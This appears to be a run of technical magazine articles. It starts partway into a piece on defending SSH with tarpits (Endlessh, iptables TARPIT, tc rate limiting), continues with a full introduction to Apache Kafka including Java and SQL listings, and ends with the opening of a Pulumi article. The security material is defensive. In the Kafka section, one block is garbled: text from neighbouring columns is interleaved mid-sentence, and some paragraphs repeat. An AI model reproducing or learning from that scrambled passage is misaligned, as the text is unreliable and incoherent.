vc"06m6rKE"S40rSE2l
&Noq1>p&DurlvJh84S
bHzlY
mTj-(!EP_Ta|B]CJu;s'1^:m7/PrYF
LA%jF#vxZnN3Ai

Each line of output takes 10 seconds to appear after the succeeded line and is clearly designed to confuse whoever is connecting to the port into thinking something is about to respond with useful, sane commands. Simple but clever.

If you need more information to deploy Endlessh yourself, use the docker run command with the -h option at the end to see the help output (Listing 4).

Listing 4: Endlessh Help Output
$ docker run endlessh -h

Usage: endlessh [-vh] [-46] [-d MS] [-f CONFIG] [-l LEN] [-m LIMIT] [-p PORT]
 -4        Bind to IPv4 only
 -6        Bind to IPv6 only
 -d INT    Message millisecond delay [10000]
 -f        Set and load config file [/etc/endlessh/config]
 -h        Print this help message and exit
 -l INT    Maximum banner line length (3-255) [32]
 -m INT    Maximum number of clients [4096]
 -p INT    Listening port [2222]
 -v        Print diagnostics to standard output (repeatable)
 -V        Print version information and exit

As the help output demonstrates, it is very easy to alter ports (from a container perspective), but you should edit the docker run command as discussed above. Endlessh allows you to specify how much gobbledygook is displayed with the -l (length) option. To prevent an unexpected, self-induced denial of service on your own servers, you can hard-code the maximum number of client connections permitted so that your network stack doesn't start to creak at the seams. Finally, it is possible to expose only the desired connection port on IPv4, IPv6, or both and, with the -d setting, alter the length of the gobbledygook display delays (which by default is currently set at 10,000ms or 10s).
Colonel Control

If you don't want to use a prebuilt solution like Endlessh for creating a tarpit, you can achieve similar results with tools available to Linux by default or, more accurately, with the correct kernel modules installed. As mentioned, this approach is more rate limiting than tarpitting but is ultimately much more powerful and well worth discovering. Much of the following was inspired by a blog post from 2017 [3]. An introduction that quotes Wikipedia notes that a tarpit "is a service on a computer system (usually a server) that purposely delays incoming connections" [4].

Having looked at that post, followed by a little more reading, I realized that I'd obviously missed the fact that iptables (the kernel's network firewall, courtesy of the Netfilter project's component [5]) has included by design a tarpit feature of its very own. A look at the online manual [6] (or the output of the man iptables command) has some useful information to help you get started. The premise of using the TARPIT target module in iptables, as you'd expect from such a sophisticated piece of software, looks well considered and refined.

The docs state that the iptables target "captures and holds incoming TCP connections using no local per-connection resources." Note that this reassuring opening sentence promises an improvement over Endlessh's potential for unwittingly causing a local denial-of-service attack. The manual goes on to say, "Attempts to close the connection are ignored, forcing the remote side to time out the connection in 12-24 minutes." That sounds pretty slick.

A careful reading of the manual reveals more tips. To open a "sticky" port to torment attackers, you can use the command:

$ iptables -A INPUT -p tcp -m tcp --dport 22 -j TARPIT

Noted in the documentation is that you can prevent the connection tracking (conntrack) functionality in iptables from tracking such connections with the NOTRACK target. Should you not do this, the kernel will unnecessarily use up resources for those connections that are stuck in a tarpit, which is clearly unwelcome behavior.

To get started with the advanced Linux networking approach, according to the aforementioned blog post, you need to make sure your kernel supplies the tc traffic control utility (stripped-down kernels might not have it enabled). Thankfully, on my Linux Mint version it is. To determine whether your system has the tool, enter the tc command (Listing 5).

Listing 5: tc
$ tc
Usage: tc [ OPTIONS ] OBJECT { COMMAND | help }
       tc [-force] -batch filename
where  OBJECT := { qdisc | class | filter | chain | action | monitor | exec }
       OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[aw] | -o[neline] | -j[son] | -p[retty] | -c[olor] -b[atch] [filename] | -n[etns] name | -N[umeric] | -nm | -nam[es] | { -cf | -conf } path }

In Listing 6, you can see that no rules currently are loaded in iptables.

Listing 6: iptables -nvL
$ iptables -nvL
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target prot opt in out source destination

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target prot opt in out source destination

On my laptop, an SSH server isn't installed automatically, so I have to add it to the system:

$ apt install openssh-server

The following NEW packages will be installed
  ncurses-term openssh-server openssh-sftp-server ssh-import-id

After some testing, you can uninstall those exact packages to keep your system trim. The commands in Listing 7 start up the SSH daemon (sshd) and tell you that it is listening on port 22. IPv6 and IPv4 connections are open on the default port, so you can continue.

Listing 7: Starting sshd
$ systemctl start sshd
$ lsof -i :22
COMMAND PID  USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd    5122 root 3u IPv4 62113  0t0      TCP  *:ssh (LISTEN)
sshd    5122 root 4u IPv6 62115  0t0      TCP  *:ssh (LISTEN)

At this stage, if you are testing on a server, make sure that you have altered your main SSH port and restarted your SSH daemon, or potentially you will be locked out of your server. The steps you aim to achieve are:

1. With iptables, mark all packets hitting the SSH port, TCP port 22, using the MARK target.
2. Use tc to set up the hierarchical token bucket (HTB) qdisc to catch traffic to be filtered.
3. Create an HTB rule that will be used for normal traffic (allowing the use of loads of bandwidth), calling it 1:0.
4. Create a second HTB rule that will only be allowed a tiny amount of traffic and call it 1:5.
5. Use tc to create a filter and get it to match the MARK option set in step 1; then, watch it get allocated to the 1:5 traffic flows.
6. Check the output of both the HTB traffic class rules to look for overlimits.

Now it's time to put those steps in action. To begin, add an iptables rule with a "mangle" table that helps you manipulate connections to your heart's content. For step 1, you may need to adjust the -A options to -I if you have rules in place. MARK your connections to the SSH port (with two rules, one for the source port and one for the destination, because you'll test to see whether it works by using connections from another local machine):

$ iptables -A OUTPUT -t mangle -p tcp --sport 22 -j MARK --set-mark 10
$ iptables -A OUTPUT -t mangle -p tcp --dport 22 -j MARK --set-mark 10

As you can see, one source port and one destination port have been configured to mark the packets with the label 10. Now, check that traffic is hitting the rules, or chains, created by checking the mangle table (Listing 8).

Listing 8: Checking the Mangle Table
$ iptables -t mangle -nvL
Chain OUTPUT (policy ACCEPT 15946 packets, 7814K bytes)
 pkts bytes target prot opt in out source    destination
  192 35671 MARK   tcp  --  *  *  0.0.0.0/0  0.0.0.0/0   tcp spt:22 MARK set 0xa
   31  4173 MARK   tcp  --  *  *  0.0.0.0/0  0.0.0.0/0   tcp dpt:22 MARK set 0xa

For step 2, run a new tc command to add the HTB qdisc (or the scheduler) to your network interface. First, however, you need to know the name of your machine's network interfaces with ip a. In my case, I can ignore the lo localhost interface, and I can see the wireless interface named wlp1s0, as seen in a line of the output:

wlp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 state UP group default qlen 1000

From now on, I can simply alter the wlp1s0 entry for the network interface. Now, add the HTB qdisc scheduler to the network interface as your parent rule (which is confusingly referenced as 1:, an abbreviated form of 1:0):

$ tc qdisc add dev wlp1s0 root handle 1: htb

As per step 3, you need to create a rule for all your network interface traffic, with the exception of your tarpit or throttled traffic, by dutifully naming this classifier 1:0 (I prefer to think of such rules as a "traffic class" for simplicity):
$ tc class add dev wlp1s0 parent 1: classid 1:0 htb rate 8000Mbit

For step 4, instead of adding loads of traffic allowance, add just 10 bytes per second (an 80bit rate) of available throughput and call the entry 1:5 for later reference:

$ tc class add dev wlp1s0 parent 1: classid 1:5 htb rate 80bit prio 1

The filter for step 5 picks up all marked packets courtesy of the iptables rules in step 1 and matches the 1:5 traffic class entry in HTB:

$ tc filter add dev wlp1s0 parent 1: prio 1 protocol ip handle 10 fw flowid 5

Note the flowid 5 to match the 1:5 traffic class and the ip handle 10 to match the iptables rules. For step 6, you can see your qdisc in action:

$ watch -n1 tc -s -g class show dev wlp1s0

Figure 1 shows the hierarchical explanation of the two child classifiers, which are sitting under the parent qdisc.

Figure 1: One large and one small traffic class, in terms of throughput.

For more granular information at the qdisc, traffic class, or filter level, you can use the commands:

$ tc qdisc show dev wlp1s0
$ tc class show dev wlp1s0
$ tc filter show dev wlp1s0

Next, you should look for your local network interface's IP address (make sure you replace my network interface name with your own):

$ ip a | grep wlp1s0 | grep inet
inet 192.168.0.16/24 brd 192.168.0.255 scope global dynamic noprefixroute wlp1s0

Now log in to another machine on your local network with SSH access (or open up SSH access for a remote machine) and run the command,

$ ssh 192.168.0.16

replacing your IP address for mine. After watching a very slow login prompt, you can generate some arbitrary noise in the terminal (use any command that you like), such as the following, which on my machine will push screeds of data up the screen:

$ find / -name chrisbinnie

If all goes well, you should see the output move very, very slowly indeed, and if you're serving an application over another port (I'm not on my laptop), other services should be absolutely fine, running as usual at the normal speed.

The proof in the pudding – that your second class is matching traffic to the filter that references the iptables rules – is seen in Figure 1 for the 1:5 class. If you run a few commands on your other machine that is SSH'd into your throttled SSH server, you should see the overlimits increase steadily. In Figure 1, that is showing 36 packets. If you need to triple-check that it is working as hoped, you can remove the running tc configuration:

$ tc qdisc del dev wlp1s0 root

SSH should magically return to being nice and responsive again.

Although you are not strictly tarpitting connections, you are limiting them significantly. The exceptional tc will only allow that tiny upper limit of bandwidth to all SSH connections on TCP port 22, so rest assured that with multiple attackers vying for such a small amount of traffic, it's not going to be an enjoyable experience.

The End Is Nigh

If you're keen to learn more about the genuinely outstanding tc and its collection of various qdiscs, which you should, you can find a lot more information online to alter your network traffic in almost any way you imagine. The manual page for Ubuntu [7] is a good start.

For further reading on tarpits, refer to the Server Fault forum [8], which discusses the good and bad elements of tarpits in detail and offers some useful insights into how the ordering of your iptables chains, or rules, can be set up to be the most efficient. Also, pay attention to the comments about accidentally filling up logs and causing a different type of denial of service that you might not have been expecting.

As mentioned before, be certain you know what you are switching on when it comes to tarpit functionality, whichever route you take. On occasion, honeypots and tarpits can be an invaluable addition to your security setup, but without some forethought, it is quite possible to tie your shoelaces across your shoes and trip yourself up, irritate your users, and cause a whole heap of extra work for yourself.

Info
[1] Endlessh: [https://github.com/skeeto/endlessh]
[2] Install Docker engine on Ubuntu: [https://docs.docker.com/engine/install/ubuntu]
[3] "Super Simple SSH Tarpit" by Gabriel Nyman, November 20, 2017: [https://nyman.re/super-simple-ssh-tarpit]
[4] Tarpit: [https://en.wikipedia.org/wiki/Tarpit_(networking)]
[5] Netfilter: [https://www.netfilter.org]
[6] iptables: [https://linux.die.net/man/8/iptables]
[7] Ubuntu tc man page: [http://manpages.ubuntu.com/manpages/cosmic/man8/tc.8.html]
[8] Server Fault: [https://serverfault.com/questions/611063/does-tarpit-have-any-known-vulnerabilities-or-downsides]
Processing streaming events with Apache Kafka

The Streamer
Apache Kafka reads and writes events virtually in real time, and you can extend it to take on a wide range of
roles in today’s world of big data and event streaming. By Kai Wähner
Event streaming is a modern concept that aims at continuously processing large volumes of data. The open source Apache Kafka [1] has established itself as a leader in the field. Kafka was originally developed by the career platform LinkedIn to process massive volumes of data in real time. Today, Kafka is used by more than 80 percent of the Fortune 100 companies, according to the project's own information.

Apache Kafka captures, processes, stores, and integrates data on a large scale. The software supports numerous applications, including distributed logging, stream processing, data integration, and pub/sub messaging. Kafka continuously processes the data almost in real time, without first writing to a database.

Kafka can connect to virtually any other data source in traditional enterprise information systems, modern databases, or the cloud. Together with the connectors available for Kafka Connect, Kafka forms an efficient integration point without hiding the logic or routing within the centralized infrastructure.

Many organizations use Kafka to monitor operating data. Kafka collects statistics from distributed applications to create centralized feeds with real-time metrics. Kafka also serves as a central source of truth for bundling data generated by various components of a distributed system. Kafka fields, stores, and processes data streams of any size (both real-time streams and streams from other interfaces, such as files or databases). As a result, companies entrust Kafka with technical tasks such as transforming, filtering, and aggregating data, and they also use it for critical business applications, such as payment transactions.

Kafka also works well as a modernized version of the traditional message broker, efficiently decoupling a process that generates events from one or more other processes that receive events.

What is Event Streaming

In the parlance of the event-streaming community, an event is any type of action, incident, or change that a piece of software or an application identifies or records. This value could be a payment, a mouse click on a website, or a temperature point recorded by a sensor, along with a description of what happened in each case.

An event connects a notification (a temporal element on the basis of which the system can trigger another action) with a state. In most cases the message is quite small – usually a few bytes or kilobytes. It is usually in a structured format, such as JSON, or is included in an object serialized with Apache Avro or Protocol Buffers (protobuf).

Architecture and Concepts

Figure 1 shows a sensor analysis use case in the Internet of Things (IoT) environment with Kafka. This scenario provides a good overview of the individual Kafka components and their interaction with other technologies.

Kafka's architecture is based on the abstract idea of a distributed commit log. By dividing the log into partitions, Kafka is able to scale systems. Kafka models events as key-value pairs. Internally, these keys and values consist only of byte sequences. However, in your preferred programming language they can often be represented as structured objects in that language's type system. Conversion between language types and internal bytes is known as (de-)serialization in Kafka-speak. As mentioned earlier, serialized formats are mostly JSON, JSON Schema, Avro, or protobuf.
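
To make the producer side concrete, here is a minimal Python sketch that serializes a sensor reading to JSON and publishes it with a key. It assumes the confluent-kafka client package, a broker on localhost:9092, and a topic named sensor-events; none of these names come from the article's scenario.

import json
from confluent_kafka import Producer

producer = Producer({"bootstrap.servers": "localhost:9092"})

# The value is an application object serialized to JSON bytes;
# the key identifies the sensor the reading belongs to.
event = {"sensor": "t-101", "celsius": 21.7}
producer.produce(
    topic="sensor-events",
    key=event["sensor"].encode(),
    value=json.dumps(event).encode(),
)
producer.flush()  # block until the broker has acknowledged the message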

Figure 1: Kafka evaluates the measuring points of the IoT sensors. A Kafka producer feeds them into the platform, and a Kafka consumer
receives them for monitoring. At the same time, they are transferred to a Spark-based analysis platform by Kafka Connect. © Confluent

Conversion between language types and internal bytes is known as (de-)serialization in Kafka-speak. As mentioned earlier, serialized formats are mostly JSON, JSON Schema, Avro, or protobuf.
What exactly do the keys and values represent? Values typically represent an application domain object or some form of raw message input in serialized form – such as the output of a sensor.
Although complex domain objects can be used as keys, they usually consist of primitive types like strings or integers. The key part of a Kafka event does not necessarily uniquely identify an event, as would the primary key of a row in a relational database. Instead, it is used to determine an identifiable variable in the system (e.g., a user, a job, or a specific connected device). Although it might not sound that significant at first, keys determine how Kafka deals with things like parallelization and data localization, as you will see.

Kafka Topics

Events tend to accumulate. That is why the IT world needs a system to organize them. Kafka's most basic organizational unit is the "topic," which roughly corresponds to a table in a relational database. For developers working with Kafka, the topic is the abstraction they think about most. You create topics to store different types of events. Topics can also comprise filtered and transformed versions of existing topics.
A topic is a logical construct. Kafka stores the events for a topic in a log. These logs are easy to understand because they are simple data structures with known semantics. You should keep three things in mind: (1) Kafka events always append to the end of a logfile. When the software writes a new message to a log, it always ends up at the last position. (2) You can only read events by searching for an arbitrary position (offset) in the log and then sequentially browsing log entries. Kafka does not allow queries like ANSI SQL, which lets you search for a certain value. (3) The events in the log prove to be immutable – past events are very difficult to undo.
The logs themselves are basically perpetual. Traditional messaging systems in companies use queues as well as topics. These queues buffer messages on their way from source to destination. However, they usually also delete the messages after consumption; the goal there is not to keep messages around so that they can be fed to the same or another application later (Figure 2).
Because Kafka topics are available as logfiles, the data they contain is by nature not temporarily available, as in traditional messaging systems, but permanently available. You can configure each topic so that the data expires either after a certain age (retention time) or as soon as the topic reaches a certain size. The time span can range from seconds to years to indefinitely. The logs underlying Kafka topics are stored as files on a disk. When Kafka writes an event to a topic, it is as permanent as the data in a classical relational database.
system (e.g., a user, a job, or a spe- by searching for an arbitrary position relational database.
cific connected device). (offset) in the log and then sequen- The simplicity of the log and the im-
Although it might not sound that sig- tially browsing log entries. Kafka does mutability of the content it contains
nificant at first, keys determine how not allow queries like ANSI SQL, are the key to Kafka’s success as a
Kafka deals with things like parallel- which lets you search for a certain critical component in modern data
ization and data localization, as you value. (3) The events in the log prove infrastructures. A (real) decoupling of
will see. to be immutable – past events are the systems therefore works far bet-
very difficult to undo. ter than with traditional middleware
Kafka Topics The logs themselves are basically per- (Figure 3), which relies on the extract,
petual. Traditional messaging systems transform, load (ETL) mechanism or
Events tend to accumulate. That is in companies use queues as well as an enterprise service bus (ESB) and
why the IT world needs a system to topics. These queues buffer messages which is based either on web services
organize them. Kafka’s most basic on their way from source to destina- or message queues. Kafka simplifies
organizational unit is the “topic,” tion. However, they usually also de- domain-driven design (DDD) but also


Figure 2: Kafka’s consumers sometimes consume the data in real time. © Confluent

Kafka simplifies domain-driven design (DDD) but also allows communication with outdated interfaces [2].

Kafka Partitions

If a topic had to live exclusively on one machine, Kafka's scalability would be limited quite radically. Therefore, the software (in contrast to classical messaging systems) divides a logical topic into partitions, which it distributes to different machines (Figure 4), allowing individual topics to be scaled as desired in terms of data throughput and read and write access.
Partitioning takes the single topic and splits it (without redundancy) into several logs, each of which exists on a separate node in the Kafka cluster. This approach distributes the work of storing messages, writing new messages, and processing existing messages across many nodes in the cluster.
Once Kafka has partitioned a topic, you need a way to decide which messages Kafka should write to which partitions. If a message appears without a key, Kafka usually distributes the subsequent messages in a round-robin process to all partitions of the topic. In this case, all partitions receive an equal amount of data, but the incoming messages do not adhere to a specific order.
If the message includes a key, Kafka calculates the target partition from a hash of the key. In this way, the software guarantees that messages with the same key always end up in the same partition and therefore always remain in the correct order. Keys are not unique, though, but reference an identifiable value in the system. For example, if the events all belong to the same customer, the customer ID used as a key guarantees that all events for a particular customer always arrive in the correct order. This guaranteed order is one of the great advantages of the append-only commit log in Kafka.
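The key-to-partition mapping can be pictured in a few lines of Java. This is only a conceptual sketch: Kafka's real default partitioner applies a murmur2 hash to the serialized key, but the principle of hashing modulo the partition count is the same:

// Conceptual sketch: events with the same key always land
// in the same partition (Kafka itself hashes with murmur2)
static int partitionFor(byte[] serializedKey, int numPartitions) {
    int hash = java.util.Arrays.hashCode(serializedKey);
    return (hash & 0x7fffffff) % numPartitions;  // keep the result non-negative
}

One practical consequence of this scheme is that adding partitions to an existing topic changes the mapping, so events for a given key may then land in a different partition than before.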

Figure 3: Apache Kafka’s domain-driven design helps decouple middleware. © Confluent


Kafka Brokers

Thus far, I have explained events, topics, and partitions, but I have not yet addressed the actual computers too explicitly. From a physical infrastructure perspective, Kafka comprises a network of machines known as brokers. Today, these are probably not physical servers, but more typically containers running on pods, which in turn run on virtualized servers running on actual processors in a physical data center somewhere in the world.
Whatever they do, they are independent machines, each running the Kafka broker process. Each broker hosts a certain set of partitions and handles incoming requests to write new events to the partitions or read events from them. Brokers also replicate the partitions among themselves.

Replication

Storing each partition on just one broker is not enough: Regardless of whether the brokers are bare-metal servers or managed containers, they and the storage space on which they are based are vulnerable to failure. For this reason, Kafka copies the partition data to several other brokers to keep it safe.
These copies are known as "follower replicas," whereas the main partition is known as the "leader replica" in Kafka-speak. When a producer generates data for the leader (generally in the form of read and write operations), the leader and the followers work together to replicate these new writes to the followers automatically. If one node in the cluster dies, developers can be confident that the data is safe because another node automatically takes over its role.

Figure 4: Replication in Kafka with a leader, followers, topics, and partitions. © Confluent

Client Applications

Now I will leave the Kafka cluster itself and turn to the applications that Kafka either populates or taps into: the producers and consumers. These client applications contain code developed by Kafka users to insert messages into and read messages from topics. Every component of the Kafka platform that is not a Kafka broker is basically a producer or consumer – or both. Producers and consumers form the interfaces to the Kafka cluster.

Kafka Producers

The API interface of the producer library is quite lightweight: A Java class named KafkaProducer connects the client to the cluster. This class has some configuration parameters, including the address of some brokers in the cluster, a suitable security configuration, and other settings that influence the network behavior of the producer.
Transparently for the developer, the library manages connection pools, network buffers, and the processes of waiting for confirmation of messages by brokers and possibly retransmitting messages. It also handles a multitude of other details that the application programmer does not need to worry about.
The excerpt in Listing 1 shows the use of the KafkaProducer API to generate and send 10 payment messages.

Listing 1: KafkaProducer API

[...]
try (KafkaProducer<String, Payment> producer = new KafkaProducer<String, Payment>(props)) {

  for (long i = 0; i < 10; i++) {
    final String orderId = "id" + Long.toString(i);
    final Payment payment = new Payment(orderId, 1000.00d);
    final ProducerRecord<String, Payment> record =
      new ProducerRecord<String, Payment>("transactions",
                                          payment.getId().toString(),
                                          payment);
    producer.send(record);
  }
} catch (final InterruptedException e) {
  e.printStackTrace();
}
[...]
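Listing 1 presupposes a props object that the excerpt does not show. A minimal sketch of what it could contain follows; the broker address is an example, and the serializer class for the Payment type is an invented placeholder (in practice, a schema-aware serializer such as Confluent's Avro serializer would be a common choice):

Properties props = new Properties();
// Address of at least one broker in the cluster
props.put("bootstrap.servers", "localhost:9092");
// Keys in Listing 1 are plain strings
props.put("key.serializer",
          "org.apache.kafka.common.serialization.StringSerializer");
// Hypothetical serializer for the Payment domain object
props.put("value.serializer", "com.example.PaymentSerializer");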


Kafka Consumers

Where there are producers, there are usually also consumers. The use of the KafkaConsumer API is similar in principle to that of the KafkaProducer API. The client connects to the cluster via the KafkaConsumer class. The class also has configuration options, which determine the address of the cluster, security options, and other parameters. On the basis of the connection, the consumer then subscribes to one or more topics.
Kafka scales consumer groups more or less automatically. Just like KafkaProducer, KafkaConsumer also manages connection pooling and the network protocol. However, the functionality on the consumer side goes far beyond the network cables.
When a consumer reads a message, it does not delete it, which is what distinguishes Kafka from traditional message queues. The message is still there, and any interested consumer can read it. In fact, it is quite normal in Kafka for many consumers to access a topic.
This seemingly minor fact has a disproportionately large influence on the types of software architectures that are emerging around Kafka, because Kafka is suitable not just for real-time data processing. In many cases, other systems also consume the data, including batch processes, file processing, request-response web services (representational state transfer, REST/simple object access protocol, SOAP), data warehouses, and machine learning infrastructures.
The excerpt in Listing 2 shows how the KafkaConsumer API consumes and processes 10 payment messages.

Listing 2: KafkaConsumer API

[...]
try (final KafkaConsumer<String, Payment> consumer = new KafkaConsumer<>(props)) {
  consumer.subscribe(Collections.singletonList(TOPIC));

  while (true) {
    ConsumerRecords<String, Payment> records = consumer.poll(10);
    for (ConsumerRecord<String, Payment> record : records) {
      String key = record.key();
      Payment value = record.value();
      System.out.printf("key = %s, value = %s%n", key, value);
    }
  }
}
[...]

Kafka Ecosystem

If there were only brokers managing partitioned, replicated topics with an ever-growing collection of producers and consumers, who in turn write and read events, this would already be quite a useful system. However, the Kafka developer community has learned that further application scenarios soon emerge among users in practice. To implement these, users then usually develop similar functions around the Kafka core. To do so, they build layers of application functionality to handle certain recurring tasks.
The code developed by Kafka users may do important work, but it is usually not relevant to the actual business field in which their activities lie. At most, it indirectly generates value for the users. Ideally, the Kafka community or infrastructure providers should provide such code. And they do: Kafka Connect [3], the Confluent Schema Registry [4], Kafka Streams [5], and ksqlDB [6] are examples of this kind of infrastructure code. Here, I look at each of these examples in turn.

Data Integration with Kafka Connect

Information often resides in systems other than Kafka. Sometimes you want to convert data from these systems into Kafka topics; sometimes you want to store data from Kafka topics on these systems. The Kafka Connect integration API is the right tool for the job.
Kafka Connect comprises an ecosystem of connectors on the one hand and a client application on the other. The client application runs as a server process on hardware separate from the Kafka brokers – not just a single Connect worker, but a cluster of Connect workers who share the data transfer load into and out of Kafka from and to external systems. This arrangement makes the service scalable and fault tolerant.
Kafka Connect also relieves the user of the need to write complicated code: A JSON configuration is all that is required. The excerpt in Listing 3 shows how to stream data from Kafka into an Elasticsearch installation.

Listing 3: JSON for Kafka Connect

[...]
{
  "connector.class": "io.confluent.connect.elasticsearch.ElasticsearchSinkConnector",
  "topics": "my_topic",
  "connection.url": "http://elasticsearch:9200",
  "type.name": "_doc",
  "key.ignore": "true",
  "schema.ignore": "true"
}
[...]
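Such a configuration typically reaches the Connect cluster by way of its REST interface. As a sketch, assuming a Connect worker listening on the default port 8083 and a file named elastic-sink.json that wraps the settings from Listing 3 in the usual name/config envelope, the upload is a single request:

curl -X POST -H "Content-Type: application/json" \
     --data @elastic-sink.json \
     http://connect-worker:8083/connectors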
Kafka Streams and ksqlDB

In a very large Kafka-based application, consumers tend to increase complexity. For example, you might start with a simple stateless transformation (e.g., obfuscating personal information or changing the format of a message to meet internal schema requirements). Kafka users soon end up with complex aggregations, enrichments, and more.
The code of the KafkaConsumer API does not provide much support for such operations: Developers working for Kafka users therefore have to program a fair amount of frame code to deal with time slots, latecomer messages, lookup tables, aggregations by key, and more.
When programming, it is also important to remember that operations such as aggregation and enrichment are typically stateful. The Kafka application must not lose this state, but at the same time it must remain highly available: If the application fails, its state is also lost.


You could try to develop a schema to maintain this state somewhere, but it is devilishly complicated to write and debug on a large scale, and it wouldn't really help to improve the lives of Kafka users directly. Therefore, Apache Kafka offers an API for stream processing: Kafka Streams.

Kafka Streams

The Kafka Streams Java API allows easy access to all computational primitives of stateless and stateful stream processing (actions such as filtering, grouping, aggregating, merging, etc.), removing the need to write framework code against the consumer API to do all these things. Kafka Streams also supports the potentially large number of states that result from the calculations of the data stream processing. It also keeps the data collections and enrichments either in memory or in a local key-value store (based on RocksDB).
Combining stateful data processing and high scalability turns out to be a big challenge. The Streams API solves both problems: On the one hand, it maintains the state on the local hard disk and in internal topics in the Kafka cluster; on the other hand, the client application (i.e., the Kafka Streams cluster) automatically scales as Kafka adds or removes new client instances.
In a typical microservice, the application performs stream processing in addition to other functions. For example, a mail order company combines shipment events with events in a product information change log, which contains customer records, to create shipment notification objects that other services then convert into email and text messages. However, the shipment notification service might also be required to provide a REST API for synchronous key queries by mobile applications once the apps render views that show the status of a particular shipment.
The service reacts to events. In this case, it first merges three data streams with each other and may perform further state calculations (state windows) according to the merges. Nevertheless, the service also serves HTTP requests at its REST endpoint.
Because Kafka Streams is a Java library and not a set of dedicated infrastructure components, it is trivial to integrate directly into other applications and develop sophisticated, scalable, fault-tolerant stream processing. This feature is one of the key differences from other stream-processing frameworks like ksqlDB, Apache Storm, or Apache Flink.
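To make this concrete, the following sketch implements the kind of stateless masking transformation mentioned earlier with the Streams API; the topic names and the masking logic are invented for illustration:

StreamsBuilder builder = new StreamsBuilder();
builder
  .stream("customer-events",
          Consumed.with(Serdes.String(), Serdes.String()))
  // Stateless transformation: obfuscate anything that
  // looks like an email address before forwarding
  .mapValues(value -> value.replaceAll("\\S+@\\S+", "***"))
  .to("customer-events-masked",
      Produced.with(Serdes.String(), Serdes.String()));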

ksqlDB

Kafka Streams, as a Java-based stream-processing API, is very well suited for creating scalable, standalone stream-processing applications. However, it is also suitable for enriching the stream-processing functions available in Java applications.
What if applications are not in Java or the developers are looking for a simpler solution? What if it seems advantageous from an architectural or operational point of view to implement a pure stream-processing job without a web interface or API to provide the results to the frontend? In this case, ksqlDB enters the play.
The highly specialized database is optimized for applications that process data streams. It runs on its own scalable, fault-tolerant cluster and provides a REST interface for applications that then submit new stream-processing jobs to execute and retrieve results.
The stream-processing jobs and queries are written in SQL. Thanks to the interface options by REST and the command line, it does not matter which programming language the applications use. It is a good idea to start in development mode, either with Docker or a single node running natively on a development machine, or directly in a supported service.
In summary, ksqlDB is a standalone, SQL-based, stream-processing engine that continuously processes event streams and makes the results available to database-like applications. It aims to provide a conceptual model for most Kafka-based stream-processing application workloads. For comparison, Listing 4 shows an example of logic that continuously collects and counts the values of a message attribute. The beginning of the listing shows the Kafka Streams version; the second part shows the version written in ksqlDB.
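As a brief taste of this SQL dialect, the following sketch declares a stream over an existing topic and then runs a continuous query against it; the stream and column names are invented:

-- Declare a stream on top of an existing Kafka topic
CREATE STREAM payments (id VARCHAR, amount DOUBLE)
  WITH (KAFKA_TOPIC='transactions', VALUE_FORMAT='JSON');

-- Continuously count events per key
SELECT id, COUNT(*) FROM payments GROUP BY id EMIT CHANGES;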
Listing 4: Kafka Streams vs ksqlDB

[...]
// Kafka Streams (Java):
builder
  .stream("input-stream",
          Consumed.with(Serdes.String(), Serdes.String()))
  .groupBy((key, value) -> value)
  .count()
  .toStream()
  .to("counts", Produced.with(Serdes.String(), Serdes.Long()));

// ksqlDB (SQL):

SELECT x, count(*) FROM stream GROUP BY x EMIT CHANGES;
[...]

Conclusions and Outlook

Kafka has established itself on the market as the de facto standard for event streaming; many companies use it in production in various projects. Meanwhile, Kafka continues to develop.
With all the advantages of Apache Kafka, it is important not to ignore the disadvantages: Event streaming is a fundamentally new concept. Development, testing, and operation are therefore completely different from using known infrastructures. For example, Apache Kafka uses rolling upgrades instead of active-passive deployments.
That Kafka is a distributed system also has an effect on production operations. Kafka is more complex than plain vanilla messaging systems, and the hardware requirements are also completely different. For example, Apache ZooKeeper requires stable, low latencies. In return, the software processes large amounts of data (or small but critical business transactions) in real time and is highly available. This process not only involves sending from A to B, but also loosely coupled and scalable data integration of source and target systems with Kafka Connect and continuous event processing (stream processing) with Kafka Streams or ksqlDB.
In this article, I explained the basic concepts of Apache Kafka, but there are other helpful components as well:
- The REST proxy [7] takes care of communication over HTTP(S) with Kafka (producer, consumer, administration).
- The Schema Registry [4] regulates data governance; it manages and versions schemas and enforces certain data structures.
- Cloud services simplify the operation of fully managed serverless infrastructures, in particular, but also of platform-as-a-service offerings.
Apache Kafka version 3.0 will remove the dependency on ZooKeeper (for easier operation and even better scalability and performance), offer fully managed (serverless) Kafka Cloud services, and allow hybrid deployments (edge, data center, and multicloud).
Two videos from this year's Kafka Summit [8] [9], an annual conference of the Kafka community, also offer an outlook on the future and a review of the history of Apache Kafka. The conference took place online for the first time in 2020 and counted more than 30,000 registered developers.

Info
[1] Apache Kafka: [https://kafka.apache.org]
[2] Domain-driven design: [https://www.confluent.io/blog/microservices-apache-kafka-domain-driven-design]
[3] Kafka Connect: [https://docs.confluent.io/current/connect/userguide.html]
[4] Confluent Schema Registry: [https://docs.confluent.io/current/schema-registry/index.html]
[5] Kafka Streams: [https://kafka.apache.org/documentation/streams/]
[6] ksqlDB: [https://ksqldb.io]
[7] REST proxy: [https://github.com/confluentinc/kafka-rest]
[8] Kafka trends: [https://www.youtube.com/watch?v=eRc4SWa6Ivo]
[9] Kafka future: [https://www.youtube.com/watch?v=PRHGymrzGxg]

Pulumi multicloud orchestrator

Fluent

Pulumi promises a unified interface and surface for orchestrating various clouds and Kubernetes. By Martin Loschwitz

The idea of populating all clouds with the same templates has remained a pipe dream until now. Although some services offer a compatibility interface for templates from Amazon Web Services (AWS), it being the industry leader, my experience suggests you should not rely on it. Admins are faced with the major dilemma of theoretically having to learn how to use the orchestration tools for various clouds and maintain their own templates (see "The Nebulous Cloud" box). Tools like Terraform (Figure 1) promise to avoid exactly that.
One relatively new player in the field of these tools is Pulumi. It differs significantly from other tools in that it uses known programming languages instead of its own declarative syntax. So, how does it work, and what does the admin get out of it?

Infrastructure as Code

